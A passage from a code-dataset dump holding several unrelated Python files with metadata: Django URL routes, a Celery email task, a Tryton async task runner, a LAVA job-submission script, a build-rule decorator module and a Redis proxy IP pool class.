}, { "api_name": "database.Base", "line_number": 100, "usage_type": "name" }, { "api_name": "sqlalchemy.Column", "line_number": 103, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 103, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 104, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 104, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 105, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 105, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 106, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 106, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 106, "usage_type": "call" }, { "api_name": "sqlalchemy.orm.relationship", "line_number": 107, "usage_type": "call" }, { "api_name": "sqlalchemy.orm.relationship", "line_number": 108, "usage_type": "call" }, { "api_name": "database.Base", "line_number": 117, "usage_type": "name" }, { "api_name": "sqlalchemy.Column", "line_number": 120, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 120, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 121, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 121, "usage_type": "call" }, { "api_name": "sqlalchemy.orm.relationship", "line_number": 122, "usage_type": "call" }, { "api_name": "database.Base", "line_number": 128, "usage_type": "name" }, { "api_name": "sqlalchemy.Column", "line_number": 131, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 131, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 132, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 132, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 133, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 133, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 133, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 134, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 134, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 135, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 135, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 136, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 136, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 137, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 137, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 137, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 138, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 138, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 138, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 139, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 139, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 140, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 140, "usage_type": "call" }, { "api_name": "database.Base", "line_number": 142, "usage_type": "name" }, { "api_name": "sqlalchemy.Column", "line_number": 145, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 145, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 146, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 146, "usage_type": "call" }, { "api_name": "sqlalchemy.orm.relationship", "line_number": 147, "usage_type": "call" }, { "api_name": "database.Base", "line_number": 153, "usage_type": "name" }, { "api_name": "sqlalchemy.Column", "line_number": 156, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 156, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 157, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 157, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 158, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 158, "usage_type": "call" }, { "api_name": "sqlalchemy.orm.relationship", "line_number": 159, "usage_type": "call" }, { "api_name": "database.Base", "line_number": 167, "usage_type": "name" }, { "api_name": "sqlalchemy.Column", "line_number": 170, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 170, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 171, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 171, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 172, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 172, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 172, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 173, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 173, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 174, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 174, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 175, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 175, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 175, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 176, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 176, "usage_type": "call" }, { "api_name": "sqlalchemy.Column", "line_number": 177, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 177, "usage_type": "argument" }, { "api_name": "sqlalchemy.ForeignKey", "line_number": 177, "usage_type": "call" }, { "api_name": "database.Base", "line_number": 186, "usage_type": "name" }, { "api_name": "sqlalchemy.Column", "line_number": 189, "usage_type": "call" }, { "api_name": "sqlalchemy.Integer", "line_number": 189, "usage_type": "argument" }, { "api_name": "sqlalchemy.Column", "line_number": 190, "usage_type": "call" }, { "api_name": "sqlalchemy.String", "line_number": 190, "usage_type": "call" }, { "api_name": "sqlalchemy.orm.relationship", "line_number": 191, "usage_type": "call" } ]
3206122
from django.urls import path from address_app import views app_name = 'address' urlpatterns = [ path('settle/',views.settle_accounts,name='settle'), path('addresspg/',views.address_page,name='addresspg'), path('addressok/',views.address_ok,name='addressok'), path('ybaddress/',views.ybaddress,name='ybaddress') ]
null
address_app/urls.py
urls.py
py
330
python
en
code
null
code-starcoder2
83
[ { "api_name": "django.urls.path", "line_number": 7, "usage_type": "call" }, { "api_name": "address_app.views.settle_accounts", "line_number": 7, "usage_type": "attribute" }, { "api_name": "address_app.views", "line_number": 7, "usage_type": "name" }, { "api_name": "django.urls.path", "line_number": 8, "usage_type": "call" }, { "api_name": "address_app.views.address_page", "line_number": 8, "usage_type": "attribute" }, { "api_name": "address_app.views", "line_number": 8, "usage_type": "name" }, { "api_name": "django.urls.path", "line_number": 9, "usage_type": "call" }, { "api_name": "address_app.views.address_ok", "line_number": 9, "usage_type": "attribute" }, { "api_name": "address_app.views", "line_number": 9, "usage_type": "name" }, { "api_name": "django.urls.path", "line_number": 10, "usage_type": "call" }, { "api_name": "address_app.views.ybaddress", "line_number": 10, "usage_type": "attribute" }, { "api_name": "address_app.views", "line_number": 10, "usage_type": "name" } ]
36093736
from celery import shared_task from django.core.mail import send_mail # from settings import settings WRONG from django.conf import settings @shared_task( autoretry_for=(Exception,), retry_kwargs={ 'max_retries': 5, 'default_retry_delay': 60, }, ) def send_registration_email(body, email_to): title = 'Activate Your Account' send_mail( title, body, settings.DEFAULT_FROM_EMAIL, [email_to], fail_silently=False, )
null
app/accounts/tasks.py
tasks.py
py
497
python
en
code
null
code-starcoder2
83
[ { "api_name": "django.core.mail.send_mail", "line_number": 17, "usage_type": "call" }, { "api_name": "django.conf.settings.DEFAULT_FROM_EMAIL", "line_number": 20, "usage_type": "attribute" }, { "api_name": "django.conf.settings", "line_number": 20, "usage_type": "name" }, { "api_name": "celery.shared_task", "line_number": 8, "usage_type": "call" } ]
400909341
from django.conf.urls import url, include, patterns from rest_framework import routers urlpatterns = patterns('api.views', url(r'^establecimiento/$','establecimiento' ), url(r'^contratante/$','contratante' ), url(r'^establecimientodetalle/(?P<id>\d+)/$','establecimientodetalle' ), )
null
api/urls.py
urls.py
py
296
python
en
code
null
code-starcoder2
83
[ { "api_name": "django.conf.urls.patterns", "line_number": 4, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call" } ]
83645527
#!/usr/bin/env python # -*- coding: utf-8 -*- import functools import subprocess import time from .core import core from .targets import Target from .option import is_option from .variable import Variable from .exceptions import (FaffError, RuleError) # Error messages. ENORMALISE = "rule `{}` argument `{}` unexpected input" EARG_LEN = "rule `{}` argument {} has more than two elements" EARG = "rule `{}` argument {} unexpected input" EARG_DEPENDS = "rule `{}` target {} dependency {} unexpected input" EDEPEND = "rule `{}` dependency {} not a `Target` instance" EDEPEND_EXISTS = "rule `{}` dependencies do not exist" EDEPEND_CIRCULAR = "rule `{}` target {} dependency {} is circular" EOPTION = "rule `{}` option {} not an `Option` instance" ETARGET = "rule `{}` target {} not a `Target` instance" ETARGET_DEPENDS = "rule `{}` target {} dependencies not a tuple" ETARGET_DEPEND = "rule `{}` target {} dependency {} not a `Target` instance" ETARGET_EXISTS = "rule `{}` target {} does not exist" ETARGET_RULE_DEPEND_UPDATED = "rule `{}` target {} out of date compared to rule dependency {}" # noqa ETARGET_DEPEND_UPDATED = "rule `{}` target {} out of date compared to dependency {}" # noqa EKEYBOARD_INT = "rule `{}` keyboard interrupt" class Rule(object): """Default rule function decorator, decorated function is called based on the state of targets, their dependencies and other keyword arguments to the decorator. `func` Decorated function. `*args` Target arguments in a defined rule pattern. `**kwargs` `depends` Optional additional dependencies applied to all rule arguments. `options` Optional decorated option functions for command line configuration. `args` Optional arguments passed to decorated function on call. `context` Optional variable context. Decorated functions must have the arguments:: @rule(...) def func(**kwargs): ... Where keyword arguments contain the following: `target` Out of date ``Target`` instance. `depends` List of ``Target`` instance dependencies associated with target. `options` Dictionary of option decorator argument values. `args` Optional arguments passed to decorator. Where ``target`` is an out of date ``Target`` instance, ``depends`` is a list of ``Target`` instance dependencies associated with the target, and ``args`` is the value passed to the keyword argument of the same name in the decorator. When instance is called, rule function will run based on state of targets and dependencies, returning a boolean indicating success and results dictionary containing more information. """ # Private methods. def __init__(self, func, *args, **kwargs): # Name, function and description from decorator. self._name = func.__name__ self._func = func self._description = func.__doc__ # Optional rule dependencies (`depends` keyword argument). self._rule_depends = self._normalise("depends", kwargs, Target) # Optional rule options (`options` keyword argument). self._rule_options = self._normalise("options", kwargs, is_option) self._opt_values = {} # Optional rule arguments (`args` keyword argument.) self._rule_args = kwargs.get("args", None) # Optional variable context argument. self._context = kwargs.get("context", None) # Targets and dependencies. self._targets = [] self._depends = [] # Process decorator positional arguments. for i, arg in enumerate(args): # Break loop if true is not returned. if not self._process(i, arg): break # Cast to tuples internally. self._targets = tuple(self._targets) self._depends = tuple(self._depends) # Check internal data. self._check() def __call__(self, opt_values=None): # Determine which targets, dependencies require update. # Rule results dictionary. results = { # Total number of targets, updated targets. "total": len(self._targets), "updated": 0, # Total time elapsed (calculated in ._results() method). "time": time.time(), # Individual target results. "results": {}, } # Rule keyword arguments. kwargs = { # Used to pass option values to rule targets .updated() method. "options": self._opt_values if opt_values is None else opt_values, "args": self._rule_args, } # If rule dependencies do not exist, return error. if not self.exists(): results["results"][0] = { "error": EDEPEND_EXISTS.format(self._name)} return self._results(results) # Get rule dependencies updated time. rdepends_updated = [] for depend in self._rule_depends: rdepends_updated.append( depend.updated(opt_values=kwargs["options"])) # If RulePattern1 (no targets). if results["total"] == 0: # Set total counter to 1 for semantics, update rule. results["total"] = 1 results["results"] = self.update(**kwargs) return self._results(results) # Track targets to update, associated dependencies. rtargets = [] rdepends = [] # Else iterate over targets. for i, pair in enumerate(zip(self._targets, self._depends)): target, depends = pair # If depends is none, use empty list. depends = [] if depends is None else depends # Check dependencies are not circular, get updated time. tdepends_updated = [] for j, depend in enumerate(depends): if target == depend: results["results"][i] = { "error": EDEPEND_CIRCULAR.format(self._name, i, j)} break tdepends_updated.append( depend.updated(opt_values=kwargs["options"])) # Exit loop if dependency error. if len(tdepends_updated) != len(depends): break # If target does not exist, update required. if not target.exists(): core.debug(__name__, ETARGET_EXISTS, self._name, i) rtargets.append(target) rdepends.append(depends) continue # Judge if the target was just updated. updated = target.updated(opt_values=kwargs["options"]) if abs(updated - time.time()) < 0.05: rtargets.append(target) rdepends.append(depends) continue # Continue loop if update required. # TODO: Cleaner way to do this. update = False # Compare target updated time to rule dependencies. for j, rd_updated in enumerate(rdepends_updated): if updated <= rd_updated: core.debug( __name__, ETARGET_RULE_DEPEND_UPDATED, self._name, i, j) rtargets.append(target) rdepends.append(depends) update = True break if update: continue # Compare target updated time to dependencies. for j, td_updated in enumerate(tdepends_updated): if updated <= td_updated: core.debug( __name__, ETARGET_DEPEND_UPDATED, self._name, i, j) rtargets.append(target) rdepends.append(depends) break # Update rule if targets to update and loop did not exit early. if (len(rtargets) > 0) and (len(rtargets) == len(rdepends)): results["results"] = self.update(rtargets, rdepends, **kwargs) return self._results(results) def _normalise(self, key, kwargs, cls): # Get value from keyword arguments, default to empty list. arg = kwargs.get(key, []) # Wrap argument as tuple for consistency. if isinstance(arg, list) or isinstance(arg, tuple): return tuple(arg) elif isinstance(cls, type): if isinstance(arg, cls): return tuple([arg]) elif cls(arg): return tuple([arg]) # Raise error for unexpected input. core.exception(ENORMALISE, self._name, key, cls=RuleError) def _process(self, i, arg): # If argument is Target instance, RulePattern2. if isinstance(arg, Target): self._targets.append(arg) self._depends.append(None) return True # Else if argument is list or tuple. elif isinstance(arg, list) or isinstance(arg, tuple): # Raise error if list length is greater than two. if len(arg) > 2: core.exception(EARG_LEN, self._name, i, cls=RuleError) # Extract targets, dependencies from argument list. targets = arg[0] if len(arg) > 0 else None depends = arg[1] if len(arg) > 1 else None # If targets is Target instance. if isinstance(targets, Target): self._targets.append(targets) # If dependencies is Target instance, RulePattern3. if isinstance(depends, Target): self._depends.append(tuple([depends])) return True # Else if dependencies is list or tuple, RulePattern4. elif isinstance(depends, list) or isinstance(depends, tuple): self._depends.append(tuple(depends)) return True # Else if targets is list or tuple. elif isinstance(targets, list) or isinstance(targets, tuple): # If dependencies is a Target instance, RulePattern5. if isinstance(depends, Target): for target in targets: self._targets.append(target) self._depends.append(tuple([depends])) return True # Else if dependencies is list or tuple. elif isinstance(depends, list) or isinstance(depends, tuple): # If not equal in length, RulePattern7. if len(targets) != len(depends): for target in targets: self._targets.append(target) self._depends.append(tuple(depends)) return True # If equal in length. for j, pair in enumerate(zip(targets, depends)): target, depend = pair self._targets.append(target) # If dependency is Target, RulePattern6. if isinstance(depend, Target): self._depends.append(tuple([depend])) # Else if dependency is list or tuple, RulePattern8. elif (isinstance(depend, list) or isinstance(depend, tuple)): self._depends.append(tuple(depend)) # Unknown dependency argument. else: core.exception( EARG_DEPENDS, self._name, i, j, cls=RuleError) return True # No arguments, RulePattern1. # Raise error for unknown argument. core.exception(EARG, self._name, i, cls=RuleError) def _check(self): # Rule dependencies must be list of Target instances. for i, depend in enumerate(self._rule_depends): if not isinstance(depend, Target): core.exception(EDEPEND, self._name, i, cls=RuleError) # Rule options must be list of options. for i, opt in enumerate(self._rule_options): if not is_option(opt): core.exception(EOPTION, self._name, i, cls=RuleError) # Targets must be a list of Target instances. for i, pair in enumerate(zip(self._targets, self._depends)): target, depends = pair if not isinstance(target, Target): core.exception(ETARGET, self._name, i, cls=RuleError) # Skip dependencies checks. if depends is None: continue # Target dependencies must be a list of lists of Target instances. if not isinstance(depends, tuple): core.exception(ETARGET_DEPENDS, self._name, i, cls=RuleError) for j, depend in enumerate(depends): if not isinstance(depend, Target): core.exception( ETARGET_DEPEND, self._name, i, j, cls=RuleError) def _results(self, results): # TODO: Use named tuple here. # Process results dictionary to determine success. success = True for i, result in results["results"].items(): # Write error messages to stderr. if result["error"] is not None: core.stderr(result["error"]) success = False else: results["updated"] += 1 results["time"] = time.time() - results["time"] return (success, results) # Public properties, methods. @property def name(self): """Return rule name string.""" return self._name @property def description(self): """Return rule description string.""" return self._description @property def targets(self): """Return list of rule targets.""" return self._targets def add_options(self, parser): """Add rule options to argument parser instance. `parser` Instance of ArgumentParser. """ for opt in self._rule_options: opt._option.add(parser) def call_options(self, args): """Call rule options with arguments returned by argument parser. `args` Instance of argparse.Namespace. """ for opt in self._rule_options: value = getattr(args, opt._option.name) self._opt_values[opt._option.name] = value opt._option(value) def exists(self): """Return true if rule dependencies exist.""" # Check rule dependencies exist. for depend in self._rule_depends: if not depend.exists(): return False # Check dependencies of each target. for depends in self._depends: if depends is not None: for depend in depends: if not depend.exists(): return False # Dependencies exist. return True # Reimplemented methods. def update(self, targets=None, depends=None, **kwargs): """Update rule targets and dependencies, serial implementation. `targets` List of out of date targets. `depends` List of lists of dependencies associated with targets. """ def _update(kwargs): # Rule function call. result = { # Elapsed time for this target. "time": time.time(), "error": None, } try: self._func(**kwargs) except KeyboardInterrupt: result["error"] = EKEYBOARD_INT.format(self._name) except subprocess.CalledProcessError as err: result["error"] = err.output except FaffError as err: result["error"] = err.message # TODO: Catch generic exceptions? # Calculate elapsed time, set result. result["time"] = time.time() - result["time"] return result # Update results, keyword arguments. results = {} # RulePattern1, no targets. if (targets is None) and (depends is None): results[0] = _update(kwargs) return results # Iterate over targets, dependencies lists. for i, pair in enumerate(zip(targets, depends)): target, depends = pair kwargs["target"] = target kwargs["depends"] = depends # Save variable context, set automatic variables. ctx = Variable.save("_", self._context) Variable("_T", str(target), self._context) Variable("_D", " ".join([str(x) for x in depends]), self._context) # Update rule function. results[i] = _update(kwargs) # Restore variable values. Variable.restore(ctx, self._context) return results def rule(*args, **kwargs): """Rule function decorator, function and arguments used to create a ``Rule`` instance. `*args` Positional arguments to ``Rule`` class. `**kwargs` Keyword arguments to ``Rule`` class. """ def _decorator(func): # TODO: Use rule subclasses here, keyword argument? _rule = Rule(func, *args, **kwargs) @functools.wraps(func) def _func(*args): return _rule(*args) _func._rule = _rule return _func return _decorator def is_rule(obj): """Return true if object is a rule instance. `obj` Object instance. """ if hasattr(obj, "_rule"): return isinstance(obj._rule, Rule) return False
null
faff/rule.py
rule.py
py
17,896
python
en
code
null
code-starcoder2
83
[ { "api_name": "targets.Target", "line_number": 85, "usage_type": "argument" }, { "api_name": "option.is_option", "line_number": 88, "usage_type": "argument" }, { "api_name": "time.time", "line_number": 122, "usage_type": "call" }, { "api_name": "core.core.debug", "line_number": 179, "usage_type": "call" }, { "api_name": "core.core", "line_number": 179, "usage_type": "name" }, { "api_name": "time.time", "line_number": 186, "usage_type": "call" }, { "api_name": "core.core.debug", "line_number": 198, "usage_type": "call" }, { "api_name": "core.core", "line_number": 198, "usage_type": "name" }, { "api_name": "core.core.debug", "line_number": 212, "usage_type": "call" }, { "api_name": "core.core", "line_number": 212, "usage_type": "name" }, { "api_name": "core.core.exception", "line_number": 238, "usage_type": "call" }, { "api_name": "core.core", "line_number": 238, "usage_type": "name" }, { "api_name": "exceptions.RuleError", "line_number": 238, "usage_type": "name" }, { "api_name": "targets.Target", "line_number": 242, "usage_type": "argument" }, { "api_name": "core.core.exception", "line_number": 252, "usage_type": "call" }, { "api_name": "core.core", "line_number": 252, "usage_type": "name" }, { "api_name": "exceptions.RuleError", "line_number": 252, "usage_type": "name" }, { "api_name": "targets.Target", "line_number": 259, "usage_type": "argument" }, { "api_name": "targets.Target", "line_number": 263, "usage_type": "argument" }, { "api_name": "targets.Target", "line_number": 276, "usage_type": "argument" }, { "api_name": "targets.Target", "line_number": 298, "usage_type": "argument" }, { "api_name": "core.core.exception", "line_number": 308, "usage_type": "call" }, { "api_name": "core.core", "line_number": 308, "usage_type": "name" }, { "api_name": "exceptions.RuleError", "line_number": 309, "usage_type": "name" }, { "api_name": "core.core.exception", "line_number": 315, "usage_type": "call" }, { "api_name": "core.core", "line_number": 315, "usage_type": "name" }, { "api_name": "exceptions.RuleError", "line_number": 315, "usage_type": "name" }, { "api_name": "targets.Target", "line_number": 320, "usage_type": "argument" }, { "api_name": "core.core.exception", "line_number": 321, "usage_type": "call" }, { "api_name": "core.core", "line_number": 321, "usage_type": "name" }, { "api_name": "exceptions.RuleError", "line_number": 321, "usage_type": "name" }, { "api_name": "option.is_option", "line_number": 325, "usage_type": "call" }, { "api_name": "core.core.exception", "line_number": 326, "usage_type": "call" }, { "api_name": "core.core", "line_number": 326, "usage_type": "name" }, { "api_name": "exceptions.RuleError", "line_number": 326, "usage_type": "name" }, { "api_name": "targets.Target", "line_number": 331, "usage_type": "argument" }, { "api_name": "core.core.exception", "line_number": 332, "usage_type": "call" }, { "api_name": "core.core", "line_number": 332, "usage_type": "name" }, { "api_name": "exceptions.RuleError", "line_number": 332, "usage_type": "name" }, { "api_name": "core.core.exception", "line_number": 340, "usage_type": "call" }, { "api_name": "core.core", "line_number": 340, "usage_type": "name" }, { "api_name": "exceptions.RuleError", "line_number": 340, "usage_type": "name" }, { "api_name": "targets.Target", "line_number": 342, "usage_type": "argument" }, { "api_name": "core.core.exception", "line_number": 343, "usage_type": "call" }, { "api_name": "core.core", "line_number": 343, "usage_type": "name" }, { "api_name": "exceptions.RuleError", "line_number": 344, "usage_type": "name" }, { "api_name": "core.core.stderr", "line_number": 354, "usage_type": "call" }, { "api_name": "core.core", "line_number": 354, "usage_type": "name" }, { "api_name": "time.time", "line_number": 359, "usage_type": "call" }, { "api_name": "time.time", "line_number": 430, "usage_type": "call" }, { "api_name": "subprocess.CalledProcessError", "line_number": 437, "usage_type": "attribute" }, { "api_name": "exceptions.FaffError", "line_number": 439, "usage_type": "name" }, { "api_name": "time.time", "line_number": 444, "usage_type": "call" }, { "api_name": "variable.Variable.save", "line_number": 462, "usage_type": "call" }, { "api_name": "variable.Variable", "line_number": 462, "usage_type": "name" }, { "api_name": "variable.Variable", "line_number": 463, "usage_type": "call" }, { "api_name": "variable.Variable", "line_number": 464, "usage_type": "call" }, { "api_name": "variable.Variable.restore", "line_number": 470, "usage_type": "call" }, { "api_name": "variable.Variable", "line_number": 470, "usage_type": "name" }, { "api_name": "functools.wraps", "line_number": 488, "usage_type": "call" } ]
186091510
# -*- coding: UTF-8 -*- """ trytond_async.tasks Implements the actual task runners. Usual celery projects would have the method/functions which have the code to run as tasks. However, the tryton inheritance and majority of tryton code being in class and instance methods makes it hard for the pattern to be followed. Read more about the design on the getting started documentation of this module. """ from trytond import backend from trytond.transaction import Transaction from trytond.pool import Pool from trytond.cache import Cache from trytond_async.app import app class RetryWithDelay(Exception): """ A special case of exception meant to be used by Tryton models to indicate to the worker that the task needs to be retried. This is needed because Tryton models itself are ignorant to the invocation from regular model code and asynchronously through workers! :param delay: Delay in seconds after which the task should be retried """ def __init__(self, delay=5, *args, **kwargs): super(RetryWithDelay, self).__init__(*args, **kwargs) self.delay = delay def _execute(app, database, user, payload_json): """ Execute the task identified by the given payload in the given database as `user`. """ if database not in Pool.database_list(): # Initialise the database if this is the first time we see the # database being used. with Transaction().start(database, 0, readonly=True): Pool(database).init() with Transaction().start(database, 0): Cache.clean(database) with Transaction().start(database, user) as transaction: Async = Pool().get('async.async') DatabaseOperationalError = backend.get('DatabaseOperationalError') # De-serialize the payload in the transaction context so that # active records are constructed in the same transaction cache and # context. payload = Async.deserialize_payload(payload_json) try: with Transaction().set_context(payload['context']): results = Async.execute_payload(payload) except RetryWithDelay as exc: # A special error that would be raised by Tryton models to # retry the task after a certain delay. Useful when the task # got triggered before the record is ready and similar cases. transaction.connection.rollback() raise app.retry(exc=exc, countdown=exc.delay) except DatabaseOperationalError as exc: # Strict transaction handling may cause this. # Rollback and Retry the whole transaction if within # max retries, or raise exception and quit. transaction.connection.rollback() raise app.retry(exc=exc) except Exception: transaction.connection.rollback() raise else: transaction.connection.commit() return results @app.task(bind=True, default_retry_delay=2) def execute(app, database, user, payload_json): return _execute(app, database, user, payload_json)
null
tasks.py
tasks.py
py
3,145
python
en
code
null
code-starcoder2
83
[ { "api_name": "trytond.pool.Pool.database_list", "line_number": 41, "usage_type": "call" }, { "api_name": "trytond.pool.Pool", "line_number": 41, "usage_type": "name" }, { "api_name": "trytond.transaction.Transaction", "line_number": 44, "usage_type": "call" }, { "api_name": "trytond.pool.Pool", "line_number": 45, "usage_type": "call" }, { "api_name": "trytond.transaction.Transaction", "line_number": 47, "usage_type": "call" }, { "api_name": "trytond.cache.Cache.clean", "line_number": 48, "usage_type": "call" }, { "api_name": "trytond.cache.Cache", "line_number": 48, "usage_type": "name" }, { "api_name": "trytond.transaction.Transaction", "line_number": 50, "usage_type": "call" }, { "api_name": "trytond.pool.Pool", "line_number": 51, "usage_type": "call" }, { "api_name": "trytond.backend.get", "line_number": 52, "usage_type": "call" }, { "api_name": "trytond.backend", "line_number": 52, "usage_type": "name" }, { "api_name": "trytond.transaction.Transaction", "line_number": 60, "usage_type": "call" }, { "api_name": "trytond_async.app.app.retry", "line_number": 67, "usage_type": "call" }, { "api_name": "trytond_async.app.app", "line_number": 67, "usage_type": "name" }, { "api_name": "trytond_async.app.app.retry", "line_number": 73, "usage_type": "call" }, { "api_name": "trytond_async.app.app", "line_number": 73, "usage_type": "name" }, { "api_name": "trytond_async.app.app", "line_number": 84, "usage_type": "argument" }, { "api_name": "trytond_async.app.app.task", "line_number": 82, "usage_type": "call" }, { "api_name": "trytond_async.app.app", "line_number": 82, "usage_type": "name" } ]
366095768
import os import sys # Actually submit job to LAVA SUBMIT = 1 def submit_testjob(jobdef): import xmlrpc.client import requests from urllib.parse import urlsplit via_squad = os.getenv("USE_QA_SERVER") == "1" if via_squad: lava_uri = os.getenv("LAVA_SERVER") if "://" not in lava_uri: lava_uri = "https://" + lava_uri qa_server_uri = os.getenv("QA_SERVER") qa_server_group = os.getenv("QA_SERVER_GROUP") qa_server_project = os.getenv("QA_SERVER_PROJECT") qa_server_build = os.getenv("EXTERNAL_BUILD_ID") if qa_server_build is None: print( "Warning: EXTERNAL_BUILD_ID environment variable is not set, " "using GIT_COMMIT_ID instead." ) qa_server_build = os.getenv("GIT_COMMIT_ID") qa_server_env = os.getenv("PLATFORM") qa_server_api = "%s/api/submitjob/%s/%s/%s/%s" % ( qa_server_uri, qa_server_group, qa_server_project, qa_server_build, qa_server_env) headers = { "Auth-Token": os.getenv("QA_REPORTS_TOKEN") } data = { "definition": jobdef, "backend": urlsplit(lava_uri).netloc # qa-reports backends are named as lava instances } print("POST:", qa_server_api, data) results = requests.post(qa_server_api, data=data, headers=headers) if results.status_code < 300: print("%s/testjob/%s" % (qa_server_uri, results.text)) else: print("status code: %s" % results.status_code) print(results.text) else: username = os.getenv("LAVA_USER") token = os.getenv("LAVA_TOKEN") uri = os.getenv("LAVA_SERVER") if not uri.endswith("/"): uri += "/" server = xmlrpc.client.ServerProxy("https://%s:%s@%s" % (username, token, uri)) job_id = server.scheduler.submit_job(jobdef) if isinstance(job_id, list): job_id = job_id[0] print("LAVA: https://%s../scheduler/job/%s" % (uri, job_id)) with open(sys.argv[1]) as f: jobdef = f.read() if SUBMIT: submit_testjob(jobdef)
null
lava_submit.py
lava_submit.py
py
2,225
python
en
code
null
code-starcoder2
83
[ { "api_name": "os.getenv", "line_number": 14, "usage_type": "call" }, { "api_name": "os.getenv", "line_number": 17, "usage_type": "call" }, { "api_name": "os.getenv", "line_number": 21, "usage_type": "call" }, { "api_name": "os.getenv", "line_number": 22, "usage_type": "call" }, { "api_name": "os.getenv", "line_number": 23, "usage_type": "call" }, { "api_name": "os.getenv", "line_number": 24, "usage_type": "call" }, { "api_name": "os.getenv", "line_number": 30, "usage_type": "call" }, { "api_name": "os.getenv", "line_number": 31, "usage_type": "call" }, { "api_name": "os.getenv", "line_number": 39, "usage_type": "call" }, { "api_name": "urllib.parse.urlsplit", "line_number": 43, "usage_type": "call" }, { "api_name": "requests.post", "line_number": 46, "usage_type": "call" }, { "api_name": "os.getenv", "line_number": 54, "usage_type": "call" }, { "api_name": "os.getenv", "line_number": 55, "usage_type": "call" }, { "api_name": "os.getenv", "line_number": 56, "usage_type": "call" }, { "api_name": "xmlrpc.client.client.ServerProxy", "line_number": 59, "usage_type": "call" }, { "api_name": "xmlrpc.client.client", "line_number": 59, "usage_type": "attribute" }, { "api_name": "xmlrpc.client", "line_number": 59, "usage_type": "name" }, { "api_name": "sys.argv", "line_number": 67, "usage_type": "attribute" } ]
566264816
import redis import json """ IPPool function: 1) insert_ip: insert a proxy ip into redis 2) get_random_key: get a random key from redis 3) delete_by_key: delete a proxy ip by key """ class IPPool(object): def __init__(self): self.__HOST = '127.0.0.1' self.__PORT = 6379 self.__IPPOOL_DB = 0 self.__REDIS_CONN = redis.Redis(host=self.__HOST, port=self.__PORT, db=self.__IPPOOL_DB) def insert_ip(self, ip): # insert ip into redis # example of ip:['163.204.245.227', '9999', '广东', '高匿', 'HTTPS'] # redis_conn = redis.Redis(host=self.__HOST, port=self.__PORT, db=self.__IPPOOL_DB) # construct key and value ip_with_port = str(ip[0]) + ":" + str(ip[1]) # print("key:", ip_with_port) ip_info = json.dumps(ip) # print("value:", ip_info) self.__REDIS_CONN.set(ip_with_port, ip_info) def get_random_key(self): # select a random key from redis # redis_conn = redis.Redis(host=self.__HOST, port=self.__PORT, db=self.__IPPOOL_DB) # decode: transfer byte type to string type random_key = self.__REDIS_CONN.randomkey().decode() return random_key def delete_by_key(self, key): self.__REDIS_CONN.delete(key) return None # 无返回值 def get_proxy_ip_cnt(self): return len(self.__REDIS_CONN.keys()) if 